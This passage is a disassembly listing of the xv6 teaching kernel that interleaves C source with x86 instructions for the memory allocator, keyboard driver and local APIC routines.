catch dangling refs. memset(v, 1, PGSIZE); 80102307: 83 ec 04 sub $0x4,%esp 8010230a: 68 00 10 00 00 push $0x1000 8010230f: 6a 01 push $0x1 80102311: 53 push %ebx 80102312: e8 79 23 00 00 call 80104690 <memset> if(kmem.use_lock) 80102317: 8b 15 94 26 11 80 mov 0x80112694,%edx 8010231d: 83 c4 10 add $0x10,%esp 80102320: 85 d2 test %edx,%edx 80102322: 75 2c jne 80102350 <kfree+0x70> acquire(&kmem.lock); r = (struct run*)v; r->next = kmem.freelist; 80102324: a1 98 26 11 80 mov 0x80112698,%eax 80102329: 89 03 mov %eax,(%ebx) kmem.freelist = r; if(kmem.use_lock) 8010232b: a1 94 26 11 80 mov 0x80112694,%eax if(kmem.use_lock) acquire(&kmem.lock); r = (struct run*)v; r->next = kmem.freelist; kmem.freelist = r; 80102330: 89 1d 98 26 11 80 mov %ebx,0x80112698 if(kmem.use_lock) 80102336: 85 c0 test %eax,%eax 80102338: 75 06 jne 80102340 <kfree+0x60> release(&kmem.lock); } 8010233a: 8b 5d fc mov -0x4(%ebp),%ebx 8010233d: c9 leave 8010233e: c3 ret 8010233f: 90 nop acquire(&kmem.lock); r = (struct run*)v; r->next = kmem.freelist; kmem.freelist = r; if(kmem.use_lock) release(&kmem.lock); 80102340: c7 45 08 60 26 11 80 movl $0x80112660,0x8(%ebp) } 80102347: 8b 5d fc mov -0x4(%ebp),%ebx 8010234a: c9 leave acquire(&kmem.lock); r = (struct run*)v; r->next = kmem.freelist; kmem.freelist = r; if(kmem.use_lock) release(&kmem.lock); 8010234b: e9 f0 22 00 00 jmp 80104640 <release> // Fill with junk to catch dangling refs. memset(v, 1, PGSIZE); if(kmem.use_lock) acquire(&kmem.lock); 80102350: 83 ec 0c sub $0xc,%esp 80102353: 68 60 26 11 80 push $0x80112660 80102358: e8 c3 21 00 00 call 80104520 <acquire> 8010235d: 83 c4 10 add $0x10,%esp 80102360: eb c2 jmp 80102324 <kfree+0x44> kfree(char *v) { struct run *r; if((uint)v % PGSIZE || v < end || V2P(v) >= PHYSTOP) panic("kfree"); 80102362: 83 ec 0c sub $0xc,%esp 80102365: 68 06 74 10 80 push $0x80107406 8010236a: e8 01 e0 ff ff call 80100370 <panic> 8010236f: 90 nop 80102370 <freerange>: kmem.use_lock = 1; } void freerange(void *vstart, void *vend) { 80102370: 55 push %ebp 80102371: 89 e5 mov %esp,%ebp 80102373: 56 push %esi 80102374: 53 push %ebx char *p; p = (char*)PGROUNDUP((uint)vstart); 80102375: 8b 45 08 mov 0x8(%ebp),%eax kmem.use_lock = 1; } void freerange(void *vstart, void *vend) { 80102378: 8b 75 0c mov 0xc(%ebp),%esi char *p; p = (char*)PGROUNDUP((uint)vstart); 8010237b: 8d 98 ff 0f 00 00 lea 0xfff(%eax),%ebx 80102381: 81 e3 00 f0 ff ff and $0xfffff000,%ebx for(; p + PGSIZE <= (char*)vend; p += PGSIZE) 80102387: 81 c3 00 10 00 00 add $0x1000,%ebx 8010238d: 39 de cmp %ebx,%esi 8010238f: 72 23 jb 801023b4 <freerange+0x44> 80102391: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi kfree(p); 80102398: 8d 83 00 f0 ff ff lea -0x1000(%ebx),%eax 8010239e: 83 ec 0c sub $0xc,%esp void freerange(void *vstart, void *vend) { char *p; p = (char*)PGROUNDUP((uint)vstart); for(; p + PGSIZE <= (char*)vend; p += PGSIZE) 801023a1: 81 c3 00 10 00 00 add $0x1000,%ebx kfree(p); 801023a7: 50 push %eax 801023a8: e8 33 ff ff ff call 801022e0 <kfree> void freerange(void *vstart, void *vend) { char *p; p = (char*)PGROUNDUP((uint)vstart); for(; p + PGSIZE <= (char*)vend; p += PGSIZE) 801023ad: 83 c4 10 add $0x10,%esp 801023b0: 39 f3 cmp %esi,%ebx 801023b2: 76 e4 jbe 80102398 <freerange+0x28> kfree(p); } 801023b4: 8d 65 f8 lea -0x8(%ebp),%esp 801023b7: 5b pop %ebx 801023b8: 5e pop %esi 801023b9: 5d pop %ebp 801023ba: c3 ret 801023bb: 90 nop 801023bc: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 801023c0 <kinit1>: // the pages mapped by entrypgdir on free list. // 2. main() calls kinit2() with the rest of the physical pages // after installing a full page table that maps them on all cores. void kinit1(void *vstart, void *vend) { 801023c0: 55 push %ebp 801023c1: 89 e5 mov %esp,%ebp 801023c3: 56 push %esi 801023c4: 53 push %ebx 801023c5: 8b 75 0c mov 0xc(%ebp),%esi initlock(&kmem.lock, "kmem"); 801023c8: 83 ec 08 sub $0x8,%esp 801023cb: 68 0c 74 10 80 push $0x8010740c 801023d0: 68 60 26 11 80 push $0x80112660 801023d5: e8 46 20 00 00 call 80104420 <initlock> void freerange(void *vstart, void *vend) { char *p; p = (char*)PGROUNDUP((uint)vstart); 801023da: 8b 45 08 mov 0x8(%ebp),%eax for(; p + PGSIZE <= (char*)vend; p += PGSIZE) 801023dd: 83 c4 10 add $0x10,%esp // after installing a full page table that maps them on all cores. void kinit1(void *vstart, void *vend) { initlock(&kmem.lock, "kmem"); kmem.use_lock = 0; 801023e0: c7 05 94 26 11 80 00 movl $0x0,0x80112694 801023e7: 00 00 00 void freerange(void *vstart, void *vend) { char *p; p = (char*)PGROUNDUP((uint)vstart); 801023ea: 8d 98 ff 0f 00 00 lea 0xfff(%eax),%ebx 801023f0: 81 e3 00 f0 ff ff and $0xfffff000,%ebx for(; p + PGSIZE <= (char*)vend; p += PGSIZE) 801023f6: 81 c3 00 10 00 00 add $0x1000,%ebx 801023fc: 39 de cmp %ebx,%esi 801023fe: 72 1c jb 8010241c <kinit1+0x5c> kfree(p); 80102400: 8d 83 00 f0 ff ff lea -0x1000(%ebx),%eax 80102406: 83 ec 0c sub $0xc,%esp void freerange(void *vstart, void *vend) { char *p; p = (char*)PGROUNDUP((uint)vstart); for(; p + PGSIZE <= (char*)vend; p += PGSIZE) 80102409: 81 c3 00 10 00 00 add $0x1000,%ebx kfree(p); 8010240f: 50 push %eax 80102410: e8 cb fe ff ff call 801022e0 <kfree> void freerange(void *vstart, void *vend) { char *p; p = (char*)PGROUNDUP((uint)vstart); for(; p + PGSIZE <= (char*)vend; p += PGSIZE) 80102415: 83 c4 10 add $0x10,%esp 80102418: 39 de cmp %ebx,%esi 8010241a: 73 e4 jae 80102400 <kinit1+0x40> kinit1(void *vstart, void *vend) { initlock(&kmem.lock, "kmem"); kmem.use_lock = 0; freerange(vstart, vend); } 8010241c: 8d 65 f8 lea -0x8(%ebp),%esp 8010241f: 5b pop %ebx 80102420: 5e pop %esi 80102421: 5d pop %ebp 80102422: c3 ret 80102423: 8d b6 00 00 00 00 lea 0x0(%esi),%esi 80102429: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80102430 <kinit2>: void kinit2(void *vstart, void *vend) { 80102430: 55 push %ebp 80102431: 89 e5 mov %esp,%ebp 80102433: 56 push %esi 80102434: 53 push %ebx void freerange(void *vstart, void *vend) { char *p; p = (char*)PGROUNDUP((uint)vstart); 80102435: 8b 45 08 mov 0x8(%ebp),%eax freerange(vstart, vend); } void kinit2(void *vstart, void *vend) { 80102438: 8b 75 0c mov 0xc(%ebp),%esi void freerange(void *vstart, void *vend) { char *p; p = (char*)PGROUNDUP((uint)vstart); 8010243b: 8d 98 ff 0f 00 00 lea 0xfff(%eax),%ebx 80102441: 81 e3 00 f0 ff ff and $0xfffff000,%ebx for(; p + PGSIZE <= (char*)vend; p += PGSIZE) 80102447: 81 c3 00 10 00 00 add $0x1000,%ebx 8010244d: 39 de cmp %ebx,%esi 8010244f: 72 23 jb 80102474 <kinit2+0x44> 80102451: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi kfree(p); 80102458: 8d 83 00 f0 ff ff lea -0x1000(%ebx),%eax 8010245e: 83 ec 0c sub $0xc,%esp void freerange(void *vstart, void *vend) { char *p; p = (char*)PGROUNDUP((uint)vstart); for(; p + PGSIZE <= (char*)vend; p += PGSIZE) 80102461: 81 c3 00 10 00 00 add $0x1000,%ebx kfree(p); 80102467: 50 push %eax 80102468: e8 73 fe ff ff call 801022e0 <kfree> void freerange(void *vstart, void *vend) { char *p; p = (char*)PGROUNDUP((uint)vstart); for(; p + PGSIZE <= (char*)vend; p += PGSIZE) 8010246d: 83 c4 10 add $0x10,%esp 80102470: 39 de cmp %ebx,%esi 80102472: 73 e4 jae 80102458 <kinit2+0x28> void kinit2(void *vstart, void *vend) { freerange(vstart, vend); kmem.use_lock = 1; 80102474: c7 05 94 26 11 80 01 movl $0x1,0x80112694 8010247b: 00 00 00 } 8010247e: 8d 65 f8 lea -0x8(%ebp),%esp 80102481: 5b pop %ebx 80102482: 5e pop %esi 80102483: 5d pop %ebp 80102484: c3 ret 80102485: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80102489: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80102490 <kalloc>: // Allocate one 4096-byte page of physical memory. // Returns a pointer that the kernel can use. // Returns 0 if the memory cannot be allocated. char* kalloc(void) { 80102490: 55 push %ebp 80102491: 89 e5 mov %esp,%ebp 80102493: 53 push %ebx 80102494: 83 ec 04 sub $0x4,%esp struct run *r; if(kmem.use_lock) 80102497: a1 94 26 11 80 mov 0x80112694,%eax 8010249c: 85 c0 test %eax,%eax 8010249e: 75 30 jne 801024d0 <kalloc+0x40> acquire(&kmem.lock); r = kmem.freelist; 801024a0: 8b 1d 98 26 11 80 mov 0x80112698,%ebx if(r) 801024a6: 85 db test %ebx,%ebx 801024a8: 74 1c je 801024c6 <kalloc+0x36> kmem.freelist = r->next; 801024aa: 8b 13 mov (%ebx),%edx 801024ac: 89 15 98 26 11 80 mov %edx,0x80112698 if(kmem.use_lock) 801024b2: 85 c0 test %eax,%eax 801024b4: 74 10 je 801024c6 <kalloc+0x36> release(&kmem.lock); 801024b6: 83 ec 0c sub $0xc,%esp 801024b9: 68 60 26 11 80 push $0x80112660 801024be: e8 7d 21 00 00 call 80104640 <release> 801024c3: 83 c4 10 add $0x10,%esp return (char*)r; } 801024c6: 89 d8 mov %ebx,%eax 801024c8: 8b 5d fc mov -0x4(%ebp),%ebx 801024cb: c9 leave 801024cc: c3 ret 801024cd: 8d 76 00 lea 0x0(%esi),%esi kalloc(void) { struct run *r; if(kmem.use_lock) acquire(&kmem.lock); 801024d0: 83 ec 0c sub $0xc,%esp 801024d3: 68 60 26 11 80 push $0x80112660 801024d8: e8 43 20 00 00 call 80104520 <acquire> r = kmem.freelist; 801024dd: 8b 1d 98 26 11 80 mov 0x80112698,%ebx if(r) 801024e3: 83 c4 10 add $0x10,%esp 801024e6: a1 94 26 11 80 mov 0x80112694,%eax 801024eb: 85 db test %ebx,%ebx 801024ed: 75 bb jne 801024aa <kalloc+0x1a> 801024ef: eb c1 jmp 801024b2 <kalloc+0x22> 801024f1: 66 90 xchg %ax,%ax 801024f3: 66 90 xchg %ax,%ax 801024f5: 66 90 xchg %ax,%ax 801024f7: 66 90 xchg %ax,%ax 801024f9: 66 90 xchg %ax,%ax 801024fb: 66 90 xchg %ax,%ax 801024fd: 66 90 xchg %ax,%ax 801024ff: 90 nop 80102500 <kbdgetc>: #include "defs.h" #include "kbd.h" int kbdgetc(void) { 80102500: 55 push %ebp static inline uchar inb(ushort port) { uchar data; asm volatile("in %1,%0" : "=a" (data) : "d" (port)); 80102501: ba 64 00 00 00 mov $0x64,%edx 80102506: 89 e5 mov %esp,%ebp 80102508: ec in (%dx),%al normalmap, shiftmap, ctlmap, ctlmap }; uint st, data, c; st = inb(KBSTATP); if((st & KBS_DIB) == 0) 80102509: a8 01 test $0x1,%al 8010250b: 0f 84 af 00 00 00 je 801025c0 <kbdgetc+0xc0> 80102511: ba 60 00 00 00 mov $0x60,%edx 80102516: ec in (%dx),%al return -1; data = inb(KBDATAP); 80102517: 0f b6 d0 movzbl %al,%edx if(data == 0xE0){ 8010251a: 81 fa e0 00 00 00 cmp $0xe0,%edx 80102520: 74 7e je 801025a0 <kbdgetc+0xa0> shift |= E0ESC; return 0; } else if(data & 0x80){ 80102522: 84 c0 test %al,%al // Key released data = (shift & E0ESC ? data : data & 0x7F); 80102524: 8b 0d b4 a5 10 80 mov 0x8010a5b4,%ecx data = inb(KBDATAP); if(data == 0xE0){ shift |= E0ESC; return 0; } else if(data & 0x80){ 8010252a: 79 24 jns 80102550 <kbdgetc+0x50> // Key released data = (shift & E0ESC ? data : data & 0x7F); 8010252c: f6 c1 40 test $0x40,%cl 8010252f: 75 05 jne 80102536 <kbdgetc+0x36> 80102531: 89 c2 mov %eax,%edx 80102533: 83 e2 7f and $0x7f,%edx shift &= ~(shiftcode[data] | E0ESC); 80102536: 0f b6 82 40 75 10 80 movzbl -0x7fef8ac0(%edx),%eax 8010253d: 83 c8 40 or $0x40,%eax 80102540: 0f b6 c0 movzbl %al,%eax 80102543: f7 d0 not %eax 80102545: 21 c8 and %ecx,%eax 80102547: a3 b4 a5 10 80 mov %eax,0x8010a5b4 return 0; 8010254c: 31 c0 xor %eax,%eax c += 'A' - 'a'; else if('A' <= c && c <= 'Z') c += 'a' - 'A'; } return c; } 8010254e: 5d pop %ebp 8010254f: c3 ret } else if(data & 0x80){ // Key released data = (shift & E0ESC ? data : data & 0x7F); shift &= ~(shiftcode[data] | E0ESC); return 0; } else if(shift & E0ESC){ 80102550: f6 c1 40 test $0x40,%cl 80102553: 74 09 je 8010255e <kbdgetc+0x5e> // Last character was an E0 escape; or with 0x80 data |= 0x80; 80102555: 83 c8 80 or $0xffffff80,%eax shift &= ~E0ESC; 80102558: 83 e1 bf and $0xffffffbf,%ecx data = (shift & E0ESC ? data : data & 0x7F); shift &= ~(shiftcode[data] | E0ESC); return 0; } else if(shift & E0ESC){ // Last character was an E0 escape; or with 0x80 data |= 0x80; 8010255b: 0f b6 d0 movzbl %al,%edx shift &= ~E0ESC; } shift |= shiftcode[data]; shift ^= togglecode[data]; 8010255e: 0f b6 82 40 75 10 80 movzbl -0x7fef8ac0(%edx),%eax 80102565: 09 c1 or %eax,%ecx 80102567: 0f b6 82 40 74 10 80 movzbl -0x7fef8bc0(%edx),%eax 8010256e: 31 c1 xor %eax,%ecx c = charcode[shift & (CTL | SHIFT)][data]; 80102570: 89 c8 mov %ecx,%eax data |= 0x80; shift &= ~E0ESC; } shift |= shiftcode[data]; shift ^= togglecode[data]; 80102572: 89 0d b4 a5 10 80 mov %ecx,0x8010a5b4 c = charcode[shift & (CTL | SHIFT)][data]; 80102578: 83 e0 03 and $0x3,%eax if(shift & CAPSLOCK){ 8010257b: 83 e1 08 and $0x8,%ecx shift &= ~E0ESC; } shift |= shiftcode[data]; shift ^= togglecode[data]; c = charcode[shift & (CTL | SHIFT)][data]; 8010257e: 8b 04 85 20 74 10 80 mov -0x7fef8be0(,%eax,4),%eax 80102585: 0f b6 04 10 movzbl (%eax,%edx,1),%eax if(shift & CAPSLOCK){ 80102589: 74 c3 je 8010254e <kbdgetc+0x4e> if('a' <= c && c <= 'z') 8010258b: 8d 50 9f lea -0x61(%eax),%edx 8010258e: 83 fa 19 cmp $0x19,%edx 80102591: 77 1d ja 801025b0 <kbdgetc+0xb0> c += 'A' - 'a'; 80102593: 83 e8 20 sub $0x20,%eax else if('A' <= c && c <= 'Z') c += 'a' - 'A'; } return c; } 80102596: 5d pop %ebp 80102597: c3 ret 80102598: 90 nop 80102599: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi return -1; data = inb(KBDATAP); if(data == 0xE0){ shift |= E0ESC; return 0; 801025a0: 31 c0 xor %eax,%eax if((st & KBS_DIB) == 0) return -1; data = inb(KBDATAP); if(data == 0xE0){ shift |= E0ESC; 801025a2: 83 0d b4 a5 10 80 40 orl $0x40,0x8010a5b4 c += 'A' - 'a'; else if('A' <= c && c <= 'Z') c += 'a' - 'A'; } return c; } 801025a9: 5d pop %ebp 801025aa: c3 ret 801025ab: 90 nop 801025ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi shift ^= togglecode[data]; c = charcode[shift & (CTL | SHIFT)][data]; if(shift & CAPSLOCK){ if('a' <= c && c <= 'z') c += 'A' - 'a'; else if('A' <= c && c <= 'Z') 801025b0: 8d 48 bf lea -0x41(%eax),%ecx c += 'a' - 'A'; 801025b3: 8d 50 20 lea 0x20(%eax),%edx } return c; } 801025b6: 5d pop %ebp c = charcode[shift & (CTL | SHIFT)][data]; if(shift & CAPSLOCK){ if('a' <= c && c <= 'z') c += 'A' - 'a'; else if('A' <= c && c <= 'Z') c += 'a' - 'A'; 801025b7: 83 f9 19 cmp $0x19,%ecx 801025ba: 0f 46 c2 cmovbe %edx,%eax } return c; } 801025bd: c3 ret 801025be: 66 90 xchg %ax,%ax }; uint st, data, c; st = inb(KBSTATP); if((st & KBS_DIB) == 0) return -1; 801025c0: b8 ff ff ff ff mov $0xffffffff,%eax c += 'A' - 'a'; else if('A' <= c && c <= 'Z') c += 'a' - 'A'; } return c; } 801025c5: 5d pop %ebp 801025c6: c3 ret 801025c7: 89 f6 mov %esi,%esi 801025c9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801025d0 <kbdintr>: void kbdintr(void) { 801025d0: 55 push %ebp 801025d1: 89 e5 mov %esp,%ebp 801025d3: 83 ec 14 sub $0x14,%esp consoleintr(kbdgetc); 801025d6: 68 00 25 10 80 push $0x80102500 801025db: e8 10 e2 ff ff call 801007f0 <consoleintr> } 801025e0: 83 c4 10 add $0x10,%esp 801025e3: c9 leave 801025e4: c3 ret 801025e5: 66 90 xchg %ax,%ax 801025e7: 66 90 xchg %ax,%ax 801025e9: 66 90 xchg %ax,%ax 801025eb: 66 90 xchg %ax,%ax 801025ed: 66 90 xchg %ax,%ax 801025ef: 90 nop 801025f0 <lapicinit>: } void lapicinit(void) { if(!lapic) 801025f0: a1 9c 26 11 80 mov 0x8011269c,%eax lapic[ID]; // wait for write to finish, by reading } void lapicinit(void) { 801025f5: 55 push %ebp 801025f6: 89 e5 mov %esp,%ebp if(!lapic) 801025f8: 85 c0 test %eax,%eax 801025fa: 0f 84 c8 00 00 00 je 801026c8 <lapicinit+0xd8> //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102600: c7 80 f0 00 00 00 3f movl $0x13f,0xf0(%eax) 80102607: 01 00 00 lapic[ID]; // wait for write to finish, by reading 8010260a: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 8010260d: c7 80 e0 03 00 00 0b movl $0xb,0x3e0(%eax) 80102614: 00 00 00 lapic[ID]; // wait for write to finish, by reading 80102617: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 8010261a: c7 80 20 03 00 00 20 movl $0x20020,0x320(%eax) 80102621: 00 02 00 lapic[ID]; // wait for write to finish, by reading 80102624: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102627: c7 80 80 03 00 00 80 movl $0x989680,0x380(%eax) 8010262e: 96 98 00 lapic[ID]; // wait for write to finish, by reading 80102631: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102634: c7 80 50 03 00 00 00 movl $0x10000,0x350(%eax) 8010263b: 00 01 00 lapic[ID]; // wait for write to finish, by reading 8010263e: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102641: c7 80 60 03 00 00 00 movl $0x10000,0x360(%eax) 80102648: 00 01 00 lapic[ID]; // wait for write to finish, by reading 8010264b: 8b 50 20 mov 0x20(%eax),%edx lapicw(LINT0, MASKED); lapicw(LINT1, MASKED); // Disable performance counter overflow interrupts // on machines that provide that interrupt entry. if(((lapic[VER]>>16) & 0xFF) >= 4) 8010264e: 8b 50 30 mov 0x30(%eax),%edx 80102651: c1 ea 10 shr $0x10,%edx 80102654: 80 fa 03 cmp $0x3,%dl 80102657: 77 77 ja 801026d0 <lapicinit+0xe0> //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102659: c7 80 70 03 00 00 33 movl $0x33,0x370(%eax) 80102660: 00 00 00 lapic[ID]; // wait for write to finish, by reading 80102663: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102666: c7 80 80 02 00 00 00 movl $0x0,0x280(%eax) 8010266d: 00 00 00 lapic[ID]; // wait for write to finish, by reading 80102670: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102673: c7 80 80 02 00 00 00 movl $0x0,0x280(%eax) 8010267a: 00 00 00 lapic[ID]; // wait for write to finish, by reading 8010267d: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102680: c7 80 b0 00 00 00 00 movl $0x0,0xb0(%eax) 80102687: 00 00 00 lapic[ID]; // wait for write to finish, by reading 8010268a: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 8010268d: c7 80 10 03 00 00 00 movl $0x0,0x310(%eax) 80102694: 00 00 00 lapic[ID]; // wait for write to finish, by reading 80102697: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 8010269a: c7 80 00 03 00 00 00 movl $0x88500,0x300(%eax) 801026a1: 85 08 00 lapic[ID]; // wait for write to finish, by reading 801026a4: 8b 50 20 mov 0x20(%eax),%edx 801026a7: 89 f6 mov %esi,%esi 801026a9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi lapicw(EOI, 0); // Send an Init Level De-Assert to synchronise arbitration ID's. lapicw(ICRHI, 0); lapicw(ICRLO, BCAST | INIT | LEVEL); while(lapic[ICRLO] & DELIVS) 801026b0: 8b 90 00 03 00 00 mov 0x300(%eax),%edx 801026b6: 80 e6 10 and $0x10,%dh 801026b9: 75 f5 jne 801026b0 <lapicinit+0xc0> //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 801026bb: c7 80 80 00 00 00 00 movl $0x0,0x80(%eax) 801026c2: 00 00 00 lapic[ID]; // wait for write to finish, by reading 801026c5: 8b 40 20 mov 0x20(%eax),%eax while(lapic[ICRLO] & DELIVS) ; // Enable interrupts on the APIC (but not on the processor). lapicw(TPR, 0); } 801026c8: 5d pop %ebp 801026c9: c3 ret 801026ca: 8d b6 00 00 00 00 lea 0x0(%esi),%esi //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 801026d0: c7 80 40 03 00 00 00 movl $0x10000,0x340(%eax) 801026d7: 00 01 00 lapic[ID]; // wait for write to finish, by reading 801026da: 8b 50 20 mov 0x20(%eax),%edx 801026dd: e9 77 ff ff ff jmp 80102659 <lapicinit+0x69> 801026e2: 8d b4 26 00 00 00 00 lea 0x0(%esi,%eiz,1),%esi 801026e9: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 801026f0 <lapicid>: } int lapicid(void) { if (!lapic) 801026f0: a1 9c 26 11 80 mov 0x8011269c,%eax lapicw(TPR, 0); } int lapicid(void) { 801026f5: 55 push %ebp 801026f6: 89 e5 mov %esp,%ebp if (!lapic) 801026f8: 85 c0 test %eax,%eax 801026fa: 74 0c je 80102708 <lapicid+0x18> return 0; return lapic[ID] >> 24; 801026fc: 8b 40 20 mov 0x20(%eax),%eax } 801026ff: 5d pop %ebp int lapicid(void) { if (!lapic) return 0; return lapic[ID] >> 24; 80102700: c1 e8 18 shr $0x18,%eax } 80102703: c3 ret 80102704: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi int lapicid(void) { if (!lapic) return 0; 80102708: 31 c0 xor %eax,%eax return lapic[ID] >> 24; } 8010270a: 5d pop %ebp 8010270b: c3 ret 8010270c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80102710 <lapiceoi>: // Acknowledge interrupt. void lapiceoi(void) { if(lapic) 80102710: a1 9c 26 11 80 mov 0x8011269c,%eax } // Acknowledge interrupt. void lapiceoi(void) { 80102715: 55 push %ebp 80102716: 89 e5 mov %esp,%ebp if(lapic) 80102718: 85 c0 test %eax,%eax 8010271a: 74 0d je 80102729 <lapiceoi+0x19> //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 8010271c: c7 80 b0 00 00 00 00 movl $0x0,0xb0(%eax) 80102723: 00 00 00 lapic[ID]; // wait for write to finish, by reading 80102726: 8b 40 20 mov 0x20(%eax),%eax void lapiceoi(void) { if(lapic) lapicw(EOI, 0); } 80102729: 5d pop %ebp 8010272a: c3 ret 8010272b: 90 nop 8010272c: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80102730 <microdelay>: // Spin for a given number of microseconds. // On real hardware would want to tune this dynamically. void microdelay(int us) { 80102730: 55 push %ebp 80102731: 89 e5 mov %esp,%ebp } 80102733: 5d pop %ebp 80102734: c3 ret 80102735: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi 80102739: 8d bc 27 00 00 00 00 lea 0x0(%edi,%eiz,1),%edi 80102740 <lapicstartap>: // Start additional processor running entry code at addr. // See Appendix B of MultiProcessor Specification. void lapicstartap(uchar apicid, uint addr) { 80102740: 55 push %ebp } static inline void outb(ushort port, uchar data) { asm volatile("out %0,%1" : : "a" (data), "d" (port)); 80102741: ba 70 00 00 00 mov $0x70,%edx 80102746: b8 0f 00 00 00 mov $0xf,%eax 8010274b: 89 e5 mov %esp,%ebp 8010274d: 53 push %ebx 8010274e: 8b 4d 0c mov 0xc(%ebp),%ecx 80102751: 8b 5d 08 mov 0x8(%ebp),%ebx 80102754: ee out %al,(%dx) 80102755: ba 71 00 00 00 mov $0x71,%edx 8010275a: b8 0a 00 00 00 mov $0xa,%eax 8010275f: ee out %al,(%dx) // and the warm reset vector (DWORD based at 40:67) to point at // the AP startup code prior to the [universal startup algorithm]." outb(CMOS_PORT, 0xF); // offset 0xF is shutdown code outb(CMOS_PORT+1, 0x0A); wrv = (ushort*)P2V((0x40<<4 | 0x67)); // Warm reset vector wrv[0] = 0; 80102760: 31 c0 xor %eax,%eax //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102762: c1 e3 18 shl $0x18,%ebx // and the warm reset vector (DWORD based at 40:67) to point at // the AP startup code prior to the [universal startup algorithm]." outb(CMOS_PORT, 0xF); // offset 0xF is shutdown code outb(CMOS_PORT+1, 0x0A); wrv = (ushort*)P2V((0x40<<4 | 0x67)); // Warm reset vector wrv[0] = 0; 80102765: 66 a3 67 04 00 80 mov %ax,0x80000467 wrv[1] = addr >> 4; 8010276b: 89 c8 mov %ecx,%eax // when it is in the halted state due to an INIT. So the second // should be ignored, but it is part of the official Intel algorithm. // Bochs complains about the second one. Too bad for Bochs. for(i = 0; i < 2; i++){ lapicw(ICRHI, apicid<<24); lapicw(ICRLO, STARTUP | (addr>>12)); 8010276d: c1 e9 0c shr $0xc,%ecx // the AP startup code prior to the [universal startup algorithm]." outb(CMOS_PORT, 0xF); // offset 0xF is shutdown code outb(CMOS_PORT+1, 0x0A); wrv = (ushort*)P2V((0x40<<4 | 0x67)); // Warm reset vector wrv[0] = 0; wrv[1] = addr >> 4; 80102770: c1 e8 04 shr $0x4,%eax //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102773: 89 da mov %ebx,%edx // when it is in the halted state due to an INIT. So the second // should be ignored, but it is part of the official Intel algorithm. // Bochs complains about the second one. Too bad for Bochs. for(i = 0; i < 2; i++){ lapicw(ICRHI, apicid<<24); lapicw(ICRLO, STARTUP | (addr>>12)); 80102775: 80 cd 06 or $0x6,%ch // the AP startup code prior to the [universal startup algorithm]." outb(CMOS_PORT, 0xF); // offset 0xF is shutdown code outb(CMOS_PORT+1, 0x0A); wrv = (ushort*)P2V((0x40<<4 | 0x67)); // Warm reset vector wrv[0] = 0; wrv[1] = addr >> 4; 80102778: 66 a3 69 04 00 80 mov %ax,0x80000469 //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 8010277e: a1 9c 26 11 80 mov 0x8011269c,%eax 80102783: 89 98 10 03 00 00 mov %ebx,0x310(%eax) lapic[ID]; // wait for write to finish, by reading 80102789: 8b 58 20 mov 0x20(%eax),%ebx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 8010278c: c7 80 00 03 00 00 00 movl $0xc500,0x300(%eax) 80102793: c5 00 00 lapic[ID]; // wait for write to finish, by reading 80102796: 8b 58 20 mov 0x20(%eax),%ebx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 80102799: c7 80 00 03 00 00 00 movl $0x8500,0x300(%eax) 801027a0: 85 00 00 lapic[ID]; // wait for write to finish, by reading 801027a3: 8b 58 20 mov 0x20(%eax),%ebx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 801027a6: 89 90 10 03 00 00 mov %edx,0x310(%eax) lapic[ID]; // wait for write to finish, by reading 801027ac: 8b 58 20 mov 0x20(%eax),%ebx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 801027af: 89 88 00 03 00 00 mov %ecx,0x300(%eax) lapic[ID]; // wait for write to finish, by reading 801027b5: 8b 58 20 mov 0x20(%eax),%ebx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 801027b8: 89 90 10 03 00 00 mov %edx,0x310(%eax) lapic[ID]; // wait for write to finish, by reading 801027be: 8b 50 20 mov 0x20(%eax),%edx //PAGEBREAK! static void lapicw(int index, int value) { lapic[index] = value; 801027c1: 89 88 00 